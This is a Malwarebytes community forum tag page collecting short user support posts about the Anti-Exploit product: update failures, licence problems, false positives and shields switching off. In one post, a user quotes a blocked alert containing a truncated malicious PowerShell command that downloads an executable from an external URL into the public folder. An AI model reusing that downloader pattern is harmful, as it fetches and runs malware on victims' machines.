Jump to content
Due to inclement weather in Southwest Florida, our Clearwater support team is offline. Our other offices are available to assist you, however their responses may be delayed. We appreciate your patience and understanding during this time. ×

Search the Community

Showing results for tags 'anti-exploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Nebula
    • Malwarebytes Nebula Modules
    • Malwarebytes Endpoint Security
    • Other Malwarebytes Business Products
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL






  1. I tried to start the program for testing if Anti-Expliot works, But it say that MSVCR100.dll is missing. OS: Windows 10 Pro x64 OS Version: 1909 ( 18363.535 ) No idea why this occur.
  2. Everytime I restart my computer these checkboxes are left unchecked. If I re-check them and hit apply, then look again after they are still checked. This ends on restart. Please help! I can upload logs or whatever files needed. Thanks!
  3. When trying to open a file in Word that I downloaded via email, I get a pop-up saying that Malwarebytes Anti-Exploit has blocked an exploit attempt. Application: cmd Protection Layer: Application Behavior Protection Protection Technique: Exploit payload process blocked File/Process Blocked: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $FPF=new-object Net.WebClient$uIo='http:\potuansdqwbe.com\YUY\huonasdh.php?l=dg3.tkn'.Split('@')$tWW = '39'$rsf=$env:public+'\'+$tWW+'.exe'foreach($srf in $uIo){try{$FPF.DownloadFile($sr Attacking URL: N/A I've attached the logs from the PC. I'm not sure if this is an actual threat or Anti-Exploit flagging things as false-positives. Any help would be appreciated. Malwarebytes Anti-Exploit.zip
  4. We have Business version of Anti-Exploit and it is not updating on all computers, about 4 out of 36 updated to the latest anti exploit from The rest remained on I was able to get the other clients to update by manually downloading the latest anti exploit from your support site, but I want to make sure that when the next update comes around we will not run into the same problem. The database version and anti malware version on all clients seem to be updating just fine, it is only the anti exploit part having the issue.
  5. Exploit version not updating on Management Console, I am currently on I need to get it up to: My Management Console appears to need an update as well. Version I need to get it up to:
  6. Hello, We discovered a few weeks ago that our on premise Malwarebytes Endpoint Security server was not sending any alert emails. We restarted the server and the emails began to function again. My question is, is there a way to clear the email queue that looks like was built up? I disabled emails for a day or two, then re-enabled hoping that would do so, but it appears that it didn't work. Just this morning I received emails from Anti-Exploit for alerts that happened on 1/12/2018 and 1/10/2018. And emails from Anti-Malware from 1/27/2018 also. Any advice is welcome, thanks!
  7. The latest stable Avast version 18.1.2326 has just been released. Amongst other things it spruiks "What's new: - We've added a new Anti-Exploit module for better protection against exploits, shellcode, and other malicious executable files" Before jumping in and updating Avast does anyone know if Malwarebytes anti exploit module and the "new" Avast anti-exploit module play nicely together? Or should one be disabled?
  8. See screenshots from 2 of our users. Nothing of note on Anti-Malware scans except for some PUPs and that Adobe reader exe that wasn't a problem as per the forum below. Scans show no threats. Should I be worried? EDIT: Should mention, both PCs are W7. Database v2017 10.05.03. Anti exploit v
  9. I have a 3 year subcription to MalwareBytes anti-exploit Premium since 8/31/16. It cost me 86.26 Can. I can only get the first 10 digits of my licence key : GNYM-EZ25 (or maybe the 5 is an S?) Where do I get the full licence key for my records?
  10. Hi My MWB management server has emailed over a notice about an exploit on a client.. but I can't see particularly what it was unhappy about. The user was trying to use IE to navigate to a URL we use each month.. the user didn't log into the website behind the URL and closed the browser. Could someone tell me what the anti-exploit took exception to? Below is message and attached are the MWB Server log for that client; certain details redacted.. Alert Time: 7/24/2017 12:27:14 PM Server Hostname: SECURITY0 Server Domain/Workgroup: ****************** Server IP: Notification Catalog: Client Description: Exploit threat detected, see details below: 7/24/2017 12:25:09 PM MIR-HR Exploit attempt blocked BLOCK cmorley Internet Explorer C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE Attacked application: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE; Parent process name: iexplore.exe; Layer: Application Hardening; API ID: 900; Address: ; Module: ; AddressType: ; StackTop: ; StackBottom: ; StackPointer: ; Extra: Total count: 1. SecurityLogs - MIR-HR.csv
  11. I'm in the process of deploying MBAM and MBAE and have the Malwarebytes Management Console version All endpoints are being deployed the same way by removing the Free Endpoint uninstaller, then the system is rebooted, and after it is rebooted the software is deployed. On several of the endpoints I am getting a gray shield in the Management Console showing that shields are off. Yet when I go to the endpoint it is showing MBAE is running and when I click on the Shields tab on the endpoing in MBAE it appears that the shields are running as I have the ability to click the Deactivate button. How can I get these endpoints to have their shields on?
  12. Hi guys, So we have an interesting problem we are trying to figure out how to fix. We have a few users that run an external script in Microsoft Word and the only way to allow this script with anti-exploit running is to unshield Word in anti-exploit. I’d hate to have to disable the Microsoft word shield altogether. here's the alert: "2016-11-16T16:09:26.690-05:00";"userA1111";"2056";"C:\ProgramData\Oracle\Java\javapath\javaw.exe";"9424";"WINWORD.EXE";"3";"701";"207";"";"";"";"";"";"";"C:\windows\SYSTEM32\cmd.exe \C FOR %a In (C:\Users\userA1111\AppData\Local\Oracle\BIPublisher\TemplateBuilderforWord\tmp\tmp\201479330564782out.pdf) DO START %~sa";"";"";"";"" any help with this is most appreciated. thanks -Robbie
  13. Hi, I'm finding problems using pdf modules. I have a PDF module used to send data to a branch of our government (and produced by them). I compile the module (opened in Acrobat Reader) filling requested fields, then I have to push a button inside the module. An XML file is created and the default mail program is asked to generate a new mail, already filled with destination address, subject, text and the XML file as attachement. But Malwarebytes anti-exploit section blocks it (it blocks Acrobat Reader). I can of course disable Acrobat Reader anti-exploit protection in Malwarebytes settings, but this vanishes every other exploit protection related to Acrobat Reader too. I can see exploit blocked in the logs but if I try to add an exploit exception the list showed is empty. I attached here MB log, pdf module and screenshots Thank you in advance ZZ 20170617 - Malwarebytes and Acrobat modules.zip
  14. I wrote a Powershell script that uploads and downloads files through FTP. The script is located on a server, and 5 computers have shortcuts that point to the script. Anti-Exploit is running on all computers and managed through the Management console on the server. One of the computers occasionally blocks this file and identifies it as an exploit. ("Exploit Payload process blocked"). Once the computer is restarted or anti-exploit is restarted, we don't have issues for days at a time. The issue ONLY occurs on this specific computer, and only sporadically.
  15. I recently received an annual renewal notice for Malwarebytes Anti-Exploit from Cleverbridge. I was under the impression that with the update of Malwarebytes to 3.0, that the Anti-Exploit product was incorporated into MBAM and, if I recall correctly, MBAE was automatically removed as part of the install of MBAM 3.0. If this is so, why would I want to continue to pay for the MBAE product? I posed this question via the online contact form and got a reply from "Malwarebytes Customer Success" (what a misnomer that is!) that tells all about Cleverbridge but doesn't answer my question. I replied: "I think you missed the point of my message. Why should I renew MBAE if its features are already incorporated in MBAM 3?" The response I received today appears to be a canned response requesting that I download mb-check and FRST and send the reports back to MB. I replied saying: "Why on Earth should I download two pieces of software and provide you with all of the diagnostic info when I asked a marketing/product question and am not asking for help with a technical issue? PLEASE READ AND RESPOND TO MY ORIGINAL POST..." I have had a Lifetime License to MBAM Pro since 11/12/2013. What does it to get the attention of a real, thinking human being to provide an appropriate answer to a simple question???
  16. Currently when I give the command client install in console management on the server he is installing the version of anti-exploit, I would like to apply version I have already done the stop / start procedure in the server service and replace the file manually in the folder C: \ Program Files (x86) \ Malwarebytes Management Server \ PackageTemplate \ mbae-setup.exe but when I did this procedure the client install process only stays Not installing. With previous versions I had already done this process manually and it worked, now I do not know if the version supports this. Can you help me?
  17. My client purchased Malwarebytes for Business for 20 computers and received an ID and Key. The ID and Key work fine for activating the Malwarebytes Anti-Malware but will not activate the Anti-Exploit. We are copying and pasting the ID and Key, so it is definitely not a typo issue. Does the Anti-Exploit installation require a new and separate ID and Key from that of Malwarebytes Anti-Malware? If not, what is the problem? Replies are appreciated, thank you. - BJohnson
  18. I installed Malwarebytes 3.0 over Malwarebytes 2.0, Anti-Exploit and the beta of AntiRansomware. It loaded, I updated definitions and ran a scan. Worked beautifully. I rebooted the computer, and when Malwarebytes was fully reloaded there was a message that said exploit protection was off. Asked if I wanted to fix it. When I looked at the dashboard settings, I toggled the exploit protection to be on (it was off). It then said it was "starting," but it never loaded. Not after 3 tries. Any suggestions about making this work and helping me get rid of the little red mark on the Malwarebytes tray icon?
  19. Hi Guys, I am testing MMC for awhile now and I really like it but at times, on few of the users, the Anti-exploit Shield turns off automatically. I don't know what triggers it or how to solve it. I went over to the machine/client and saw that the shield was off and saw that the anti-exploit service was off whereas anti-malware was running just fine and had no issues what so ever. Please see the photo to see what I'm talking about (in the photo I'm hovering the mouse on top of the first client hence the grey shield, not red). Any update from you guys about this issue would be really appreciated.
  20. hello, i can not edit or remove apps in anti-exploit option yet! plz fix
  21. Is there a removal/clean tool for anti-exploit? Appears to me in this unfortunate scenario, remnants of MBAE remain and may be contributing to creating intermittent unusable/unresponsive system: Windows 7 MSE Prior installation of MBAM & MBAE licensed and separate v2.x/v1.x products Install new MBAM V3.xx - and get unsatisfactory/unusable PCs Uninstall MBAM V3.xx via Control Panel/Programs Run mbam-clean- Reinstall ONLY MBAM v 2.x Still have (sometimes) slowness of system, some to the point of making computer unusable for minutes at a time. An install of standalone MBAE then picks up all of the old settings (license, custom exclusions, etc.) which makes me realize the uninstall process of MBAM 3.x and mbam-clean has NOT cleaned anti-exploit.... Is this contributing to the problem? Hours and hours and hours of time and effort expended on my part related to my poor decision to "upgrade" to MBAM 3. Making me wonder how good a company Malwarebytes is and if something has changed about the company....? New owner? New way of doing business? Whatever it is, it's troublesome...
  22. I'm on 3.0 and tried to manually update to the latest version, but I got the error message in the first screenshot while trying to install it. I then uninstalled Malwarebytes, and got the same message while trying to install it again. I read somewhere that I should delete the mbae64.sys file in C:\Windows\System32\drivers, then to try installing it again, but I can't (see 2nd screenshot). Apparently the file is being used by something, but I can't identify it in the Task Manager. I'm running as administrator and even restarted.. nothing helps. I looked inside the Program Files\Malwarebytes\Anti-Malware folder and there is this mbae.dll file inside (3rd screenshot). I had Anti-Exploit installed before 3.0, but after 3.0 I don't know why this file is still exists. My system has been acting wonky ever since this went down.. some programs will open, but won't stay running. Please help.
  23. Up until today, we were running both Forcepoint's Endpoint DLP agent and MBAE without issues. Today the update of MBAE from to version caused a massive influx of false positives for: Exploit code executing from Heap memory blocked BLOCK Exploit payload file blocked BLOCK C:\Windows\System32\QIPCAP64.dll I have read about issues earlier this year with Websense's endpoint agent, but we did not have any issues prior today. As of right now, MBAE is disabled across the network.
  24. Hi there! I'm new to the forum but a long time user of Malwarebytes free anti-malware software. Recently my avast internet security ran out and while I was purchasing a new subscription I thought that it might be a good idea to upgrade my free Malwarebytes anti-malware to the premium version. On the way to the website (through Google) an advert popped up saying that new customers that purchase a subscription for anti-malware will be eligible to get anti-exploit for free. I really want the del but I don't know if it is real or if this is some kind of scam, I will post the link below. https://buy.malwarebytes.com/bundle/au/ Can anyone smarter than me (everyone) tell me if this is real or not? Thanks for taking the time to have a look FLS
  25. I purchased Malwarebytes Anti-Exploit on October 3rd, and was issued a unique Key & ID. When I first installed it, it worked perfectly, auto-starting as I expected it to the next morning. I shut down my PC at night to prevent malware virus "snoopers" from putting their PuP viruses on my PC. Soon after installing my newly registered version of Anti-Exploit, Microsoft pushed thru updates, which caused my Anti-Exploit app to disappear. After finally getting a work-around from Malwarebytes ( a couple days later) to restart the application, several things occurred. 1. The application now shows an ID tag that is NOT my current registration ID. 2. The application no longer starts up automatically (it's not in the Windows Startup anymore). I have to manually start it. 3. I can't find any way to get it into the Windows Startup for automatic running, nor can I discover any way to correct the Registration ID. I have deleted the entire program folder in the Windows Programs (X86) folder, but apparently the app is referencing some ID file in an APP data folder. I'd appreciate some assistance to correct these problems, so the application works correctly. I'm afraid at this point it's not working correctly because of all these issues.
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.